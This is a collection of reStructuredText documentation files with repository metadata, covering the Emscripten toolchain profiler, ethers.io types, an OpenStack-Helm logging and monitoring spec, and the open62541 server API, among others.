On Windows, replace the ``export`` keyword with ``set`` instead. The last command should generate a HTML file of form ``toolchain_profiler.results_yyyymmdd_hhmm.html`` that can be opened in the web browser to view the results.
Details
=======
The toolchain profiler is active whenever the toolchain is invoked with the environment variable ``EM_PROFILE_TOOLCHAIN=1`` being set. In this mode, each called tool will accumulate profiling instrumentation data to a set of .json files under the Emscripten temp directory.
Profiling Tool Commands
-----------------------
The command ``tools/emprofile.py --reset`` deletes all previously stored profiling data. Call this command to erase the profiling session to a fresh empty state. To start profiling, call Emscripten tool commands with the environment variable ``EM_PROFILE_TOOLCHAIN=1`` set either system-wide as shown in the example, or on a per command basis, like this:
.. code-block:: bash
cd path/to/emscripten
tools/emprofile.py --reset
EM_PROFILE_TOOLCHAIN=1 emcc tests/hello_world.c -o a.bc
EM_PROFILE_TOOLCHAIN=1 emcc a.bc -O3 -o a.html
tools/emprofile.py --graph --outfile=myresults.html
Any number of commands can be profiled within one session, and when ``tools/emprofile.py --graph`` is finally called, it will pick up records from all Emscripten tool invocations up to that point. Calling ``--graph`` also clears the recorded profiling data.
The output HTML filename can be chosen with the optional ``--outfile=myresults.html`` parameter.
Instrumenting Python Scripts
============================
In order for the toolchain to work, each "top level" Python script (a script that is directly called from the command line, or by a subprocess spawn) should have the following preamble in the beginning of the script:
.. code-block:: python
from tools.toolchain_profiler import ToolchainProfiler
if __name__ == '__main__':
ToolchainProfiler.record_process_start()
Additionally, at the end of the script when the script is about to exit, it should do so by explicitly calling either the ``sys.exit(<returncode>)`` function, or by calling the ``ToolchainProfiler.record_process_exit(<returncode>)`` function, whichever is more convenient for the script. The function ``ToolchainProfiler.record_process_exit()`` does not exit by itself, but only records that the process is quitting.
These two blocks ensure that the toolchain profiler will be aware of all tool invocations that occur. In the graphed output, the process spawns will be shown in green color.
Python Profiling Blocks
-----------------------
Graphing the subprocess start and end times alone might sometimes be a bit too coarse view into what is happening. In Python code, it is possible to hierarchically annotate individual blocks of code to break down execution into custom tasks. These blocks will be shown in blue in the output graph. To add a custom profiling block, use the Python ``with`` keyword to add a ``profile_block`` section:
.. code-block:: python
with ToolchainProfiler.profile_block('my_custom_task'):
do_some_tasks()
call_another_function()
more_code()
this_is_outside_the_block()
This will show the three functions in the same scope under a block 'my_custom_task' drawn in blue in the profiling swimlane.
In some cases it may be cumbersome to wrap the code inside a ``with`` section. For these scenarios, it is also possible to use low level C-style ``enter_block`` and ``exit_block`` statements.
.. code-block:: python
ToolchainProfiler.enter_block('my_code_block')
try:
do_some_tasks()
call_another_function()
more_code()
finally:
ToolchainProfiler.exit_block('my_code_block')
However when using this form one must be cautious to ensure that each call to ``ToolchainProfiler.enter_block()`` is matched by exactly one call to ``ToolchainProfiler.exit_block()`` in all code flows, so wrapping the code in a ``try-finally`` statement is a good idea.
| 53.988889 | 459 | 0.75036 |
c273c0b69350fbfb4d4e2b8bce8b1407c2c8c59f | 359 | rst | reStructuredText | content/blog/nsa-in-wow.rst | crhomber/blog-rhomberg-dot-org | 14264a6478a1be42aec7edbedb00dc1b8f034b07 | [
"MIT"
] | null | null | null | content/blog/nsa-in-wow.rst | crhomber/blog-rhomberg-dot-org | 14264a6478a1be42aec7edbedb00dc1b8f034b07 | [
"MIT"
] | null | null | null | content/blog/nsa-in-wow.rst | crhomber/blog-rhomberg-dot-org | 14264a6478a1be42aec7edbedb00dc1b8f034b07 | [
"MIT"
] | null | null | null | NSA spielt World of Warcraft
############################
:date: 2013-12-09 21:44
:slug: nsa-in-wow
:tags: NSA
Hehe, die NSA hat also auch in World of Warcraft "spioniert" [1]...
[1] `Spy agencies in covert push to infiltrate virtual world of online gaming <http://www.theguardian.com/world/2013/dec/09/nsa-spies-online-games-world-warcraft-second-life>`_
| 35.9 | 176 | 0.688022 |
3de8092edd90b91ff2a4fbd560ecc65447aa66ff | 349 | rst | reStructuredText | docs/development/internal-api.rst | real-or-random/HWI | 7dcd7bd57cc311cb73c48ea2335dd6be75842067 | [
"MIT"
] | 285 | 2019-01-31T03:10:19.000Z | 2022-03-31T10:38:37.000Z | docs/development/internal-api.rst | real-or-random/HWI | 7dcd7bd57cc311cb73c48ea2335dd6be75842067 | [
"MIT"
] | 426 | 2019-01-31T10:38:02.000Z | 2022-03-28T15:58:13.000Z | docs/development/internal-api.rst | real-or-random/HWI | 7dcd7bd57cc311cb73c48ea2335dd6be75842067 | [
"MIT"
] | 128 | 2019-01-30T22:32:32.000Z | 2022-03-28T19:23:46.000Z | Internal API Documentation
==========================
In addition to the public API, the classes and functions documented here are available for use within HWI itself.
.. automodule:: hwilib._base58
:members:
.. automodule:: hwilib._bech32
:members:
.. automodule:: hwilib._script
:members:
.. automodule:: hwilib._serialize
:members:
| 24.928571 | 113 | 0.687679 |
efd098b85546e6bde5b17b4b66ccb778e0ab5910 | 681 | rst | reStructuredText | source/index.rst | seowings/sphinx-netlify | 4f3e46d8059401abedc1530fdbbbd0ca4a04d443 | [
"MIT"
] | 2 | 2021-12-22T00:10:44.000Z | 2022-01-10T21:58:28.000Z | source/index.rst | seowings/sphinx-netlify | 4f3e46d8059401abedc1530fdbbbd0ca4a04d443 | [
"MIT"
] | null | null | null | source/index.rst | seowings/sphinx-netlify | 4f3e46d8059401abedc1530fdbbbd0ca4a04d443 | [
"MIT"
] | 1 | 2021-12-22T09:36:43.000Z | 2021-12-22T09:36:43.000Z | =================
Sphinx on Netlify
=================
Minimalistic Example of Hosting Sphnix on Neltify.
Install
========
Just clone this repository and then delpying it from `Netlify`_. Nothing need to be changed and it will work out of the box.
Tweaking
========
You can tweak and play with your newly deployed website. Feel free to browse through the `sphinx`_ documentation to tweak the outputs as per your requiremetns.
Pull Request
============
If you have suggestion/improvements then please consider submitting a pull request or create an issue.
.. toctree::
:maxdepth: 2
.. _sphinx: https://www.sphinx-doc.org/en/master/
.. _Netlify: https://www.netlify.com/
| 24.321429 | 159 | 0.697504 |
aeee8dc704d3bb4e7ea42cab2fcfe365614b80de | 76 | rst | reStructuredText | doc/source/manual.rst | bjornaa/ladim2 | f6c1be9028ca54370ce33dde25b005d5b0bb4677 | [
"MIT"
] | null | null | null | doc/source/manual.rst | bjornaa/ladim2 | f6c1be9028ca54370ce33dde25b005d5b0bb4677 | [
"MIT"
] | null | null | null | doc/source/manual.rst | bjornaa/ladim2 | f6c1be9028ca54370ce33dde25b005d5b0bb4677 | [
"MIT"
] | null | null | null | User Manual
===========
.. toctree::
application.rst
plugin
library
| 8.444444 | 17 | 0.578947 |
18148559cc944e40f41743fdc87af7e2b15a15fa | 4,811 | rst | reStructuredText | source/ethers-app/source/dev-api-common.rst | cryptofuture/documentation | 4a34595630e8f6ac67f0a121cd515f5338beffe8 | [
"MIT"
] | 8 | 2018-02-19T21:17:24.000Z | 2021-11-22T21:12:04.000Z | source/ethers-app/source/dev-api-common.rst | cryptofuture/documentation | 4a34595630e8f6ac67f0a121cd515f5338beffe8 | [
"MIT"
] | 14 | 2018-02-16T15:35:29.000Z | 2021-06-10T02:40:06.000Z | source/ethers-app/source/dev-api-common.rst | cryptofuture/documentation | 4a34595630e8f6ac67f0a121cd515f5338beffe8 | [
"MIT"
] | 31 | 2017-10-28T22:29:46.000Z | 2021-11-22T21:11:53.000Z | Common Types
************
There are several parameter formats and types that come up often:
- Addresses_ -- Ethereum Accounts and Contracts all have an address, which is needed to interact with them
- `Big Numbers`_ (BN.js) -- Precise numbers to work around JavaScript's lossy floating point system
- `Hex Strings`_ -- Strings of hexidecimal encoded binary data and numbers
- `Errors` -- An error indicating the user (explicitly or implicitly) cancelled an operation
.. _addresses:
Addresses
=========
Addresses come in many formats, and any may be used.
- Hex Strings (eg. 0x1234567890abcdef1234567890abcdef12345678)
- ICAP Addresses (eg. XE0724JX5HRQ9R1XA24VWJM008DMOB17YBC)
- Checksum Address (eg. 0x1234567890AbcdEF1234567890aBcdef12345678; notice uppercase and lowercase letters)
The **ICAP Address** format uses the `International Bank Account Number (IBAN)`_
format with a prefex of ``XE``.
The **Checksum Address** format uses a mixture of uppercase and lowercase
letters to encode checksum information in an address, but remains backward
compatible with systems that do not understand checksum addresses. Because of
this, addresses which are not checksum addresses must use entirely uppercase or
entirely lowercase letters.
To convert between the various formats::
// Get an ICAP address (from any address format)
var icapAddress = ethers.getAddress(address, true);
// Get a checksum address (from any address format)
var address = ethers.getAddress(address)
.. _big-numbers:
Big Numbers
===========
Since **Ethereum** deals a great deal with large numberic values (far larger
than JavaScript can handle without `loss of precission`_), many calls require and return instances
of **BigNumber**.
Some common things you will likely want to do with a **BigNumber**::
// Convert to base 10 string
var valueBase10 = value.toString();
// Convert to a number (only valid for values that fit in 53 bits)
var valueNumber = value.toNumber();
// Convert to hex string
var valueHexString = value.toHexString();
// Convert from a base 10 string
var value = ethers.utils.bigNumberify('1000000');
// Convert from a hex string (the 0x prefex is REQUIRED)
var value = ethers.utils.bigNumberify('0xf4240');
// Multiple two values
var product = value1.mul(value2)
// Convert from ether (string) to wei (BN)
var wei = ethers.parseEther('1.0');
// Convert from wei to ether (string)
var ether = ethers.formatEther(wei)
.. _hex-strings:
Hex Strings
===========
Often functions deal with binary data, which should be specified using a hex
string. Functions which require big numbers can also be passed the
hex string equivalent.
It is important to note, it **MUST** be a string, and it **MUST** begin with
the prefix ``0x``.
Example::
var binaryHelloWorld = '0x48656c6c6f576f726c64';
var thirtySeven = '0x25';
// Convert a hex string to a byte Array
ethers.utils.arrayify(binaryHelloWorld);
// Uint8Array [ 72, 101, 108, 108, 111, 87, 111, 114, 108, 100 ]
// Convert a byte Array to a hex string
ethers.utils.hexlify([12, 34, 56]);
// '0x0c2238'
// Convert a number to a hex string
ethers.utils.hexlify(37);
// '0x25'
Errors
======
.. _cancelled-error:
Cancelled Error
---------------
Any operation which requires the user to accept or decline, may reject with an error
with the message `cancelled`. This could occur without user interaction, if for example,
the application attempts to send a transaction, but the user is new and has not added
an account.
Example::
somePromise.then(function(result) {
// The call returned a result
}, function(error) {
if (error.message === 'cancelled') {
// Whatever needs to be done
}
});
.. _server-error:
Server Error
------------
Any operation that requests further information from the **ethers.io services**
may reject with an error with the message ``server error``.
Example::
somePromise.then(function(result) {
// The call returned a result
}, function(error) {
if (error.message === 'server error') {
// Whatever needs to be done
}
});
.. _Promise: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise
.. _loss of precision: http://docs.oracle.com/cd/E19957-01/806-3568/ncg_goldberg.html
.. _BN.js on GitHub: https://github.com/indutny/bn.js
.. _international bank account number (iban): https://en.wikipedia.org/wiki/International_Bank_Account_Number
.. _foobar: http://www.ecma-international.org/ecma-262/5.1/#sec-8.5
.. _foobar2: http://reference.wolfram.com/language/tutorial/MachinePrecisionNumbers.html
.. _foobar3: http://floating-point-gui.de/formats/fp/
| 29.157576 | 109 | 0.707753 |
62c45873ad08680c340434f3eca6ca4bc852febd | 8,229 | rst | reStructuredText | doc/source/specs/osh-lma-stack.rst | mmailand/openstack-helm | 07c5c79cd4a7befd095f7e35e5a14a22e5ab9306 | [
"Apache-2.0"
] | 363 | 2017-04-11T18:26:32.000Z | 2022-03-27T18:57:06.000Z | doc/source/specs/osh-lma-stack.rst | op317q/openstack-helm | 4ddc48853ef96916e065776810966770bb2543cc | [
"Apache-2.0"
] | 7 | 2017-04-20T15:13:21.000Z | 2022-02-16T02:29:57.000Z | doc/source/specs/osh-lma-stack.rst | op317q/openstack-helm | 4ddc48853ef96916e065776810966770bb2543cc | [
"Apache-2.0"
] | 223 | 2017-04-11T20:35:38.000Z | 2022-03-24T21:26:36.000Z | ..
This work is licensed under a Creative Commons Attribution 3.0 Unported
License.
http://creativecommons.org/licenses/by/3.0/legalcode
..
=====================================
OSH Logging, Monitoring, and Alerting
=====================================
Blueprints:
1. osh-monitoring_
2. osh-logging-framework_
.. _osh-monitoring: https://blueprints.launchpad.net/openstack-helm/+spec/osh-monitoring
.. _osh-logging-framework: https://blueprints.launchpad.net/openstack-helm/+spec/osh-logging-framework
Problem Description
===================
OpenStack-Helm currently lacks a centralized mechanism for providing insight
into the performance of the OpenStack services and infrastructure components.
The log formats of the different components in OpenStack-Helm vary, which makes
identifying causes for issues difficult across services. To support operational
readiness by default, OpenStack-Helm should include components for logging
events in a common format, monitoring metrics at all levels, alerting and alarms
for those metrics, and visualization tools for querying the logs and metrics in
a single pane view.
Platform Requirements
=====================
Logging Requirements
--------------------
The requirements for a logging platform include:
1. All services in OpenStack-Helm log to stdout and stderr by default
2. Log collection daemon runs on each node to forward logs to storage
3. Proper directories mounted to retrieve logs from the node
4. Ability to apply custom metadata and uniform format to logs
5. Time-series database for logs collected
6. Backed by highly available storage
7. Configurable log rotation mechanism
8. Ability to perform custom queries against stored logs
9. Single pane visualization capabilities
Monitoring Requirements
-----------------------
The requirements for a monitoring platform include:
1. Time-series database for collected metrics
2. Backed by highly available storage
3. Common method to configure all monitoring targets
4. Single pane visualization capabilities
5. Ability to perform custom queries against metrics collected
6. Alerting capabilities to notify operators when thresholds exceeded
Use Cases
=========
Logging Use Cases
-----------------
Example uses for centralized logging include:
1. Record compute instance behavior across nodes and services
2. Record OpenStack service behavior and status
3. Find all backtraces for a tenant id's uuid
4. Identify issues with infrastructure components, such as RabbitMQ, mariadb, etc
5. Identify issues with Kubernetes components, such as: etcd, CNI, scheduler, etc
6. Organizational auditing needs
7. Visualize logged events to determine if an event is recurring or an outlier
8. Find all logged events that match a pattern (service, pod, behavior, etc)
Monitoring Use Cases
--------------------
Example OpenStack-Helm metrics requiring monitoring include:
1. Host utilization: memory usage, CPU usage, disk I/O, network I/O, etc
2. Kubernetes metrics: pod status, replica availability, job status, etc
3. Ceph metrics: total pool usage, latency, health, etc
4. OpenStack metrics: tenants, networks, flavors, floating IPs, quotas, etc
5. Proactive monitoring of stack traces across all deployed infrastructure
Examples of how these metrics can be used include:
1. Add or remove nodes depending on utilization
2. Trigger alerts when desired replicas fall below required number
3. Trigger alerts when services become unavailable or unresponsive
4. Identify etcd performance that could lead to cluster instability
5. Visualize performance to identify trends in traffic or utilization over time
Proposed Change
===============
Logging
-------
Fluentd, Elasticsearch, and Kibana meet OpenStack-Helm's logging requirements
for capture, storage and visualization of logged events. Fluentd runs as a
daemonset on each node and mounts the /var/lib/docker/containers directory.
The Docker container runtime engine directs events posted to stdout and stderr
to this directory on the host. Fluentd should then declare the contents of
that directory as an input stream, and use the fluent-plugin-elasticsearch
plugin to apply the Logstash format to the logs. Fluentd will also use the
fluentd-plugin-kubernetes-metadata plugin to write Kubernetes metadata to the
log record. Fluentd will then forward the results to Elasticsearch, which
indexes the logs in a logstash-* index by default. The resulting logs can then
be queried directly through Elasticsearch, or they can be viewed via Kibana.
Kibana offers a dashboard that can create custom views on logged events, and
Kibana integrates well with Elasticsearch by default.
The proposal includes the following:
1. Helm chart for Fluentd
2. Helm chart for Elasticsearch
3. Helm chart for Kibana
All three charts must include sensible configuration values to make the
logging platform usable by default. These include: proper input configurations
for Fluentd, proper metadata and formats applied to the logs via Fluentd,
sensible indexes created for Elasticsearch, and proper configuration values for
Kibana to query the Elasticsearch indexes previously created.
Monitoring
----------
Prometheus and Grafana meet OpenStack-Helm's monitoring requirements. The
Prometheus monitoring tool provides the ability to scrape targets for metrics
over HTTP, and it stores these metrics in Prometheus's time-series database.
The monitoring targets can be discovered via static configuration in Prometheus
or through service discovery. Prometheus includes a querying language that
provides meaningful queries against the metrics gathered and supports the
creation of rules to measure these metrics against for alerting purposes. It
also supports a wide range of Prometheus exporters for existing services,
including Ceph and OpenStack. Grafana supports Prometheus as a data source, and
provides the ability to view the metrics gathered by Prometheus in a single pane
dashboard. Grafana can be bootstrapped with dashboards for each target scraped,
or the dashboards can be added via Grafana's web interface directly. To meet
OpenStack-Helm's alerting needs, Alertmanager can be used to interface with
Prometheus and send alerts based on Prometheus rule evaluations.
The proposal includes the following:
1. Helm chart for Prometheus
2. Helm chart for Alertmanager
3. Helm chart for Grafana
4. Helm charts for any appropriate Prometheus exporters
All charts must include sensible configuration values to make the monitoring
platform usable by default. These include: static Prometheus configurations
for the included exporters, static dashboards for Grafana mounted via configMaps
and configurations for Alertmanager out of the box.
Security Impact
---------------
All services running within the platform should be subject to the
security practices applied to the other OpenStack-Helm charts.
Performance Impact
------------------
To minimize the performance impacts, the following should be considered:
1. Sane defaults for log retention and rotation policies
2. Identify opportunities for improving Prometheus's operation over time
3. Elasticsearch configured to prevent memory swapping to disk
4. Elasticsearch configured in a highly available manner with sane defaults
Implementation
==============
Assignee(s)
-----------
Primary assignees:
srwilker (Steve Wilkerson)
portdirect (Pete Birley)
lr699s (Larry Rensing)
Work Items
----------
1. Fluentd chart
2. Elasticsearch chart
3. Kibana chart
4. Prometheus chart
5. Alertmanager chart
6. Grafana chart
7. Charts for exporters: kube-state-metrics, ceph-exporter, openstack-exporter?
All charts should follow design approaches applied to all other OpenStack-Helm
charts, including the use of helm-toolkit.
All charts require valid and sensible default values to provide operational
value out of the box.
Testing
=======
Testing should include Helm tests for each of the included charts as well as an
integration test in the gate.
Documentation Impact
====================
Documentation should be included for each of the included charts as well as
documentation detailing the requirements for a usable monitoring platform,
preferably with sane default values out of the box.
| 37.404545 | 102 | 0.784299 |
11107a266f647995394d275ba1ca1d2e6263f7d6 | 85 | rst | reStructuredText | doc/contrib/test.rst | KirHarms/arbor | 01c1f09efa2f1ac79bfa9800510f3ad9f99fade1 | [
"BSD-3-Clause"
] | null | null | null | doc/contrib/test.rst | KirHarms/arbor | 01c1f09efa2f1ac79bfa9800510f3ad9f99fade1 | [
"BSD-3-Clause"
] | null | null | null | doc/contrib/test.rst | KirHarms/arbor | 01c1f09efa2f1ac79bfa9800510f3ad9f99fade1 | [
"BSD-3-Clause"
] | 1 | 2021-07-06T11:07:13.000Z | 2021-07-06T11:07:13.000Z | .. _contribtest:
Tests
============
.. todo::
This page is under construction.
| 10.625 | 36 | 0.564706 |
084c08247b96aab403b3f3e3eafcde38ccc9453c | 133 | rst | reStructuredText | docs/usage/protopipe.rst | hugovk/pyirf | 12afef58a27862abfe2a6c049b68f6d05f6fe31d | [
"MIT"
] | null | null | null | docs/usage/protopipe.rst | hugovk/pyirf | 12afef58a27862abfe2a6c049b68f6d05f6fe31d | [
"MIT"
] | null | null | null | docs/usage/protopipe.rst | hugovk/pyirf | 12afef58a27862abfe2a6c049b68f6d05f6fe31d | [
"MIT"
] | null | null | null | .. _protopipe:
======================================
How to build IRFs from protopipe files
======================================
| 22.166667 | 38 | 0.315789 |
8b149203153377e46b8a5818d3ca280e0fed6d74 | 64,834 | rst | reStructuredText | static/doc/1.0/_static/server.rst | andreasebner/open62541-www-staging | 0e715605854cfaa181ef503072f8f45fdfafbb4b | [
"Apache-2.0"
] | null | null | null | static/doc/1.0/_static/server.rst | andreasebner/open62541-www-staging | 0e715605854cfaa181ef503072f8f45fdfafbb4b | [
"Apache-2.0"
] | null | null | null | static/doc/1.0/_static/server.rst | andreasebner/open62541-www-staging | 0e715605854cfaa181ef503072f8f45fdfafbb4b | [
"Apache-2.0"
] | 1 | 2021-10-12T07:01:19.000Z | 2021-10-12T07:01:19.000Z | .. _server:
Server
======
.. include:: server_config.rst
.. _server-lifecycle:
Server Lifecycle
----------------
.. code-block:: c
UA_Server * UA_Server_new(void);
/* Makes a (shallow) copy of the config into the server object.
* The config content is cleared together with the server. */
UA_Server *
UA_Server_newWithConfig(const UA_ServerConfig *config);
void UA_Server_delete(UA_Server *server);
UA_ServerConfig *
UA_Server_getConfig(UA_Server *server);
/* Runs the main loop of the server. In each iteration, this calls into the
* networklayers to see if messages have arrived.
*
* @param server The server object.
* @param running The loop is run as long as *running is true.
* Otherwise, the server shuts down.
* @return Returns the statuscode of the UA_Server_run_shutdown method */
UA_StatusCode
UA_Server_run(UA_Server *server, const volatile UA_Boolean *running);
/* The prologue part of UA_Server_run (no need to use if you call
* UA_Server_run) */
UA_StatusCode
UA_Server_run_startup(UA_Server *server);
/* Executes a single iteration of the server's main loop.
*
* @param server The server object.
* @param waitInternal Should we wait for messages in the networklayer?
* Otherwise, the timouts for the networklayers are set to zero.
* The default max wait time is 50millisec.
* @return Returns how long we can wait until the next scheduled
* callback (in ms) */
UA_UInt16
UA_Server_run_iterate(UA_Server *server, UA_Boolean waitInternal);
/* The epilogue part of UA_Server_run (no need to use if you call
* UA_Server_run) */
UA_StatusCode
UA_Server_run_shutdown(UA_Server *server);
Timed Callbacks
---------------
.. code-block:: c
typedef void (*UA_ServerCallback)(UA_Server *server, void *data);
/* Add a callback for execution at a specified time. If the indicated time lies
* in the past, then the callback is executed at the next iteration of the
* server's main loop.
*
* @param server The server object.
* @param callback The callback that shall be added.
* @param data Data that is forwarded to the callback.
* @param date The timestamp for the execution time.
* @param callbackId Set to the identifier of the repeated callback . This can
* be used to cancel the callback later on. If the pointer is null, the
* identifier is not set.
* @return Upon success, UA_STATUSCODE_GOOD is returned. An error code
* otherwise. */
UA_StatusCode
UA_Server_addTimedCallback(UA_Server *server, UA_ServerCallback callback,
void *data, UA_DateTime date, UA_UInt64 *callbackId);
/* Add a callback for cyclic repetition to the server.
*
* @param server The server object.
* @param callback The callback that shall be added.
* @param data Data that is forwarded to the callback.
* @param interval_ms The callback shall be repeatedly executed with the given
* interval (in ms). The interval must be positive. The first execution
* occurs at now() + interval at the latest.
* @param callbackId Set to the identifier of the repeated callback . This can
* be used to cancel the callback later on. If the pointer is null, the
* identifier is not set.
* @return Upon success, UA_STATUSCODE_GOOD is returned. An error code
* otherwise. */
UA_StatusCode
UA_Server_addRepeatedCallback(UA_Server *server, UA_ServerCallback callback,
void *data, UA_Double interval_ms, UA_UInt64 *callbackId);
UA_StatusCode
UA_Server_changeRepeatedCallbackInterval(UA_Server *server, UA_UInt64 callbackId,
UA_Double interval_ms);
/* Remove a repeated callback. Does nothing if the callback is not found.
*
* @param server The server object.
* @param callbackId The id of the callback */
void
UA_Server_removeCallback(UA_Server *server, UA_UInt64 callbackId);
#define UA_Server_removeRepeatedCallback(server, callbackId) \
UA_Server_removeCallback(server, callbackId);
Reading and Writing Node Attributes
-----------------------------------
The functions for reading and writing node attributes call the regular read
and write service in the background that are also used over the network.
The following attributes cannot be read, since the local "admin" user always
has full rights.
- UserWriteMask
- UserAccessLevel
- UserExecutable
.. code-block:: c
/* Read an attribute of a node. The specialized functions below provide a more
* concise syntax.
*
* @param server The server object.
* @param item ReadValueIds contain the NodeId of the target node, the id of the
* attribute to read and (optionally) an index range to read parts
* of an array only. See the section on NumericRange for the format
* used for array ranges.
* @param timestamps Which timestamps to return for the attribute.
* @return Returns a DataValue that contains either an error code, or a variant
* with the attribute value and the timestamps. */
UA_DataValue
UA_Server_read(UA_Server *server, const UA_ReadValueId *item,
UA_TimestampsToReturn timestamps);
/* Don't use this function. There are typed versions for every supported
* attribute. */
UA_StatusCode
__UA_Server_read(UA_Server *server, const UA_NodeId *nodeId,
UA_AttributeId attributeId, void *v);
static UA_INLINE UA_StatusCode
UA_Server_readNodeId(UA_Server *server, const UA_NodeId nodeId,
UA_NodeId *outNodeId) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_NODEID, outNodeId);
}
static UA_INLINE UA_StatusCode
UA_Server_readNodeClass(UA_Server *server, const UA_NodeId nodeId,
UA_NodeClass *outNodeClass) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_NODECLASS,
outNodeClass);
}
static UA_INLINE UA_StatusCode
UA_Server_readBrowseName(UA_Server *server, const UA_NodeId nodeId,
UA_QualifiedName *outBrowseName) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_BROWSENAME,
outBrowseName);
}
static UA_INLINE UA_StatusCode
UA_Server_readDisplayName(UA_Server *server, const UA_NodeId nodeId,
UA_LocalizedText *outDisplayName) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_DISPLAYNAME,
outDisplayName);
}
static UA_INLINE UA_StatusCode
UA_Server_readDescription(UA_Server *server, const UA_NodeId nodeId,
UA_LocalizedText *outDescription) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_DESCRIPTION,
outDescription);
}
static UA_INLINE UA_StatusCode
UA_Server_readWriteMask(UA_Server *server, const UA_NodeId nodeId,
UA_UInt32 *outWriteMask) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_WRITEMASK,
outWriteMask);
}
static UA_INLINE UA_StatusCode
UA_Server_readIsAbstract(UA_Server *server, const UA_NodeId nodeId,
UA_Boolean *outIsAbstract) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_ISABSTRACT,
outIsAbstract);
}
static UA_INLINE UA_StatusCode
UA_Server_readSymmetric(UA_Server *server, const UA_NodeId nodeId,
UA_Boolean *outSymmetric) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_SYMMETRIC,
outSymmetric);
}
static UA_INLINE UA_StatusCode
UA_Server_readInverseName(UA_Server *server, const UA_NodeId nodeId,
UA_LocalizedText *outInverseName) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_INVERSENAME,
outInverseName);
}
static UA_INLINE UA_StatusCode
UA_Server_readContainsNoLoop(UA_Server *server, const UA_NodeId nodeId,
UA_Boolean *outContainsNoLoops) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_CONTAINSNOLOOPS,
outContainsNoLoops);
}
static UA_INLINE UA_StatusCode
UA_Server_readEventNotifier(UA_Server *server, const UA_NodeId nodeId,
UA_Byte *outEventNotifier) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_EVENTNOTIFIER,
outEventNotifier);
}
static UA_INLINE UA_StatusCode
UA_Server_readValue(UA_Server *server, const UA_NodeId nodeId,
UA_Variant *outValue) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_VALUE, outValue);
}
static UA_INLINE UA_StatusCode
UA_Server_readDataType(UA_Server *server, const UA_NodeId nodeId,
UA_NodeId *outDataType) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_DATATYPE,
outDataType);
}
static UA_INLINE UA_StatusCode
UA_Server_readValueRank(UA_Server *server, const UA_NodeId nodeId,
UA_Int32 *outValueRank) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_VALUERANK,
outValueRank);
}
/* Returns a variant with an int32 array */
static UA_INLINE UA_StatusCode
UA_Server_readArrayDimensions(UA_Server *server, const UA_NodeId nodeId,
UA_Variant *outArrayDimensions) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_ARRAYDIMENSIONS,
outArrayDimensions);
}
static UA_INLINE UA_StatusCode
UA_Server_readAccessLevel(UA_Server *server, const UA_NodeId nodeId,
UA_Byte *outAccessLevel) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_ACCESSLEVEL,
outAccessLevel);
}
static UA_INLINE UA_StatusCode
UA_Server_readMinimumSamplingInterval(UA_Server *server, const UA_NodeId nodeId,
UA_Double *outMinimumSamplingInterval) {
return __UA_Server_read(server, &nodeId,
UA_ATTRIBUTEID_MINIMUMSAMPLINGINTERVAL,
outMinimumSamplingInterval);
}
static UA_INLINE UA_StatusCode
UA_Server_readHistorizing(UA_Server *server, const UA_NodeId nodeId,
UA_Boolean *outHistorizing) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_HISTORIZING,
outHistorizing);
}
static UA_INLINE UA_StatusCode
UA_Server_readExecutable(UA_Server *server, const UA_NodeId nodeId,
UA_Boolean *outExecutable) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_EXECUTABLE,
outExecutable);
}
The following node attributes cannot be changed once a node has been created:
- NodeClass
- NodeId
- Symmetric
- ContainsNoLoop
The following attributes cannot be written from the server, as they are
specific to the different users and set by the access control callback:
- UserWriteMask
- UserAccessLevel
- UserExecutable
.. code-block:: c
/* Overwrite an attribute of a node. The specialized functions below provide a
* more concise syntax.
*
* @param server The server object.
* @param value WriteValues contain the NodeId of the target node, the id of the
* attribute to overwritten, the actual value and (optionally) an
* index range to replace parts of an array only. of an array only.
* See the section on NumericRange for the format used for array
* ranges.
* @return Returns a status code. */
UA_StatusCode
UA_Server_write(UA_Server *server, const UA_WriteValue *value);
/* Don't use this function. There are typed versions with no additional
* overhead. */
UA_StatusCode
__UA_Server_write(UA_Server *server, const UA_NodeId *nodeId,
const UA_AttributeId attributeId,
const UA_DataType *attr_type, const void *attr);
static UA_INLINE UA_StatusCode
UA_Server_writeBrowseName(UA_Server *server, const UA_NodeId nodeId,
const UA_QualifiedName browseName) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_BROWSENAME,
&UA_TYPES[UA_TYPES_QUALIFIEDNAME], &browseName);
}
static UA_INLINE UA_StatusCode
UA_Server_writeDisplayName(UA_Server *server, const UA_NodeId nodeId,
const UA_LocalizedText displayName) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_DISPLAYNAME,
&UA_TYPES[UA_TYPES_LOCALIZEDTEXT], &displayName);
}
static UA_INLINE UA_StatusCode
UA_Server_writeDescription(UA_Server *server, const UA_NodeId nodeId,
const UA_LocalizedText description) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_DESCRIPTION,
&UA_TYPES[UA_TYPES_LOCALIZEDTEXT], &description);
}
static UA_INLINE UA_StatusCode
UA_Server_writeWriteMask(UA_Server *server, const UA_NodeId nodeId,
const UA_UInt32 writeMask) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_WRITEMASK,
&UA_TYPES[UA_TYPES_UINT32], &writeMask);
}
static UA_INLINE UA_StatusCode
UA_Server_writeIsAbstract(UA_Server *server, const UA_NodeId nodeId,
const UA_Boolean isAbstract) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_ISABSTRACT,
